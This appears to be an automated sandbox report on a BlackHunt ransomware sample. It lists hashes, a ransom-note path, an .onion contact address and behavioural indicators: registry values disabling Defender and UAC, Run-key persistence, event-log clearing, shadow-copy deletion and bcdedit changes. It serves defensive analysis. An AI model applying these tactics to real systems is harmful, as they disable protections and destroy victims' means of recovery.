Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:38
Static task
static1
Behavioral task
behavioral1
Sample
b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe
Resource
win10v2004-20231215-en
General
-
Target
b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe
-
Size
707KB
-
MD5
82d021bf2ade8e76a5faf98697d490d2
-
SHA1
8445a2acc81952afefde3493d1531c26a3791c77
-
SHA256
b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1
-
SHA512
da51a5c41d97480b346740a2dd4a3e4ccd2ecfb24907ccddbb401a9fe10aff0de117e8c6de89c70d0bb542bf7fbcfd566b1c4b31af1eeb41b42e5f39dc67bb51
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1b87vnh:6uaTmkZJ+naie5OTamgEoKxLWqrh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2476 fsutil.exe 1676 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1268 wevtutil.exe 1000 wevtutil.exe 1280 wevtutil.exe 1860 wevtutil.exe 2424 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2568 bcdedit.exe 2120 bcdedit.exe 2528 bcdedit.exe 1260 bcdedit.exe -
Renames multiple (2893) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2916 wbadmin.exe 2156 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 964 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\N: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\R: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\A: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\J: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\Z: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\I: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\G: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\T: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\U: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\H: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\K: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\L: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\V: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\Q: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\P: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\E: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\X: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\M: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\O: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\S: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files (x86)\Adobe\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jre7\lib\applet\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_SelectionSubpicture.png b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jre7\bin\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jre7\bin\server\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files (x86)\Google\Update\Install\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files (x86)\Adobe\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_ButtonGraphic.png b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files (x86)\Google\Update\Download\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 824 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2440 vssadmin.exe 2912 vssadmin.exe 2260 vssadmin.exe 2564 vssadmin.exe 2168 vssadmin.exe 1724 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2000 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1496 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1700 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeRestorePrivilege 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeBackupPrivilege 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeTakeOwnershipPrivilege 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeAuditPrivilege 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeSecurityPrivilege 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeIncBasePriorityPrivilege 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeBackupPrivilege 2344 vssvc.exe Token: SeRestorePrivilege 2344 vssvc.exe Token: SeAuditPrivilege 2344 vssvc.exe Token: SeBackupPrivilege 2736 wbengine.exe Token: SeRestorePrivilege 2736 wbengine.exe Token: SeSecurityPrivilege 2736 wbengine.exe Token: SeSecurityPrivilege 1000 wevtutil.exe Token: SeBackupPrivilege 1000 wevtutil.exe Token: SeSecurityPrivilege 1268 wevtutil.exe Token: SeBackupPrivilege 1268 wevtutil.exe Token: SeSecurityPrivilege 2424 wevtutil.exe Token: SeBackupPrivilege 2424 wevtutil.exe Token: SeSecurityPrivilege 1860 wevtutil.exe Token: SeBackupPrivilege 1860 wevtutil.exe Token: SeSecurityPrivilege 1280 wevtutil.exe Token: SeBackupPrivilege 1280 wevtutil.exe Token: SeDebugPrivilege 2000 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3036 wrote to memory of 2148 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 29 PID 3036 wrote to memory of 2148 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 29 PID 3036 wrote to memory of 2148 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 29 PID 3036 wrote to memory of 2148 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 29 PID 3036 wrote to memory of 2744 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 32 PID 3036 wrote to memory of 2744 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 32 PID 3036 wrote to memory of 2744 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 32 PID 3036 wrote to memory of 2744 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 32 PID 3036 wrote to memory of 2140 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 33 PID 3036 wrote to memory of 2140 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 33 PID 3036 wrote to memory of 2140 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 33 PID 3036 wrote to memory of 2140 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 33 PID 3036 wrote to memory of 2716 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 34 PID 3036 wrote to memory of 2716 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 34 PID 3036 wrote to memory of 2716 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 34 PID 3036 wrote to memory of 2716 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 34 PID 2148 wrote to memory of 2824 2148 cmd.exe 37 PID 2148 wrote to memory of 2824 2148 cmd.exe 37 PID 2148 wrote to memory of 2824 2148 cmd.exe 37 PID 3036 wrote to memory of 2836 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 123 PID 3036 wrote to memory of 2836 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 123 PID 3036 wrote to memory of 2836 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 123 PID 3036 wrote to memory of 2836 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 123 PID 2744 wrote to memory of 2992 2744 cmd.exe 40 PID 2744 wrote to memory of 2992 2744 cmd.exe 40 PID 2744 wrote to memory of 2992 2744 cmd.exe 40 PID 3036 wrote to memory of 2748 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 41 PID 3036 wrote to memory of 2748 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 41 PID 3036 wrote to memory of 2748 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 41 PID 3036 wrote to memory of 2748 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 41 PID 3036 wrote to memory of 2260 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 168 PID 3036 wrote to memory of 2260 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 168 PID 3036 wrote to memory of 2260 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 168 PID 3036 wrote to memory of 2260 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 168 PID 3036 wrote to memory of 2724 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 45 PID 3036 wrote to memory of 2724 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 45 PID 3036 wrote to memory of 2724 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 45 PID 3036 wrote to memory of 2724 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 45 PID 2140 wrote to memory of 2872 2140 cmd.exe 46 PID 2140 wrote to memory of 2872 2140 cmd.exe 46 PID 2140 wrote to memory of 2872 2140 cmd.exe 46 PID 3036 wrote to memory of 2636 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 47 PID 3036 wrote to memory of 2636 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 47 PID 3036 wrote to memory of 2636 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 47 PID 3036 wrote to memory of 2636 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 47 PID 3036 wrote to memory of 2912 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 129 PID 3036 wrote to memory of 2912 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 129 PID 3036 wrote to memory of 2912 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 129 PID 3036 wrote to memory of 2912 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 129 PID 3036 wrote to memory of 2696 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 52 PID 3036 wrote to memory of 2696 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 52 PID 3036 wrote to memory of 2696 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 52 PID 3036 wrote to memory of 2696 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 52 PID 2716 wrote to memory of 2756 2716 cmd.exe 51 PID 2716 wrote to memory of 2756 2716 cmd.exe 51 PID 2716 wrote to memory of 2756 2716 cmd.exe 51 PID 3036 wrote to memory of 2888 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 49 PID 3036 wrote to memory of 2888 3036 